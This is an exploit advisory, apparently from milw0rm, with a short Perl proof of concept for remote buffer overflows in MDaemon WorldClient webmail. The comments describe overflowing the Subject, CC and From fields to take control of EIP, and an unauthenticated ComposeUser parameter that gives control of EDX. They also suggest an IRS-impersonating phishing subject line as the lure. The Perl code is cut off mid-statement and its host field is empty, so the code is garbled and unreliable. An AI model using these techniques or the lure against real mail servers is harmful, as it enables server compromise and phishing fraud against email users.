# MDaemon <== v9.6.5 Multiple Remote Buffer Overflow
# Vendor Site: [url]http://altn.com[/url]
# Risk : Highly Critical
# hehe funny bugs here .. the worldclient use the port 3000 for a webmail
like (it use also an admin webmail
# located at
# port 1000 [by default both are opened])
# this file unfortunatly contain multiple buffer overflows , If you send a
message to a user ( or postmaster ? :] )
# with a subject composed of 8194 A ( like : " Do your incomming taxes
online this year, it's safe and fast,just reply with
# the supplied incomming form...8100 A " from [email]incomming@irs.gov[/email] etc )
# if the user click "answer" to the message , eip get owned
# the CC & From field is vulnerable too .
# This kind of bug is pretty nasty, because the client doesn't get owned ,
but postmaster yes. so if you have an account
# on a host providing MDaemon services ,
# you can send a mail to yourself and get some shellcode executed on the
# if you dont ... just have a look on google,you'll find out
# this poc is another bug, actually it shouldn't work, because we dont have
any cookie & session ,but it give a full control
# over EDX without any auth, dont ask why, it's like this only for this
variable [ComposeUser] =)
# Greetz to : French/Quebec security community & [url]http://spiritofhack.net[/url] .
# ungreetz to : they'll reconize them =)
# Ps: actually this audit is NOT finished ... there might be some other
remote bugs/advisory , i just dont have time for
# this at the moment, i recommend to the ones who want to do it , to look at
Webclient.exe & Webadmin.exe , there's
# some funny stuff in there hehe .
use LWP::UserAgent;
$connect = LWP::UserAgent->new;
my $payload1 ="a" x 60;
my $payload2 ="b" x 20;
my $host = ' [url][/url]';
my $req = HTTP::Request->new(POST =>
my $res = $connect->request($req);
print $res->as_string;
# "If in time like these you can talk about individual freedom, you're
probably a terrorist"
# milw0rm.com [2008-06-02]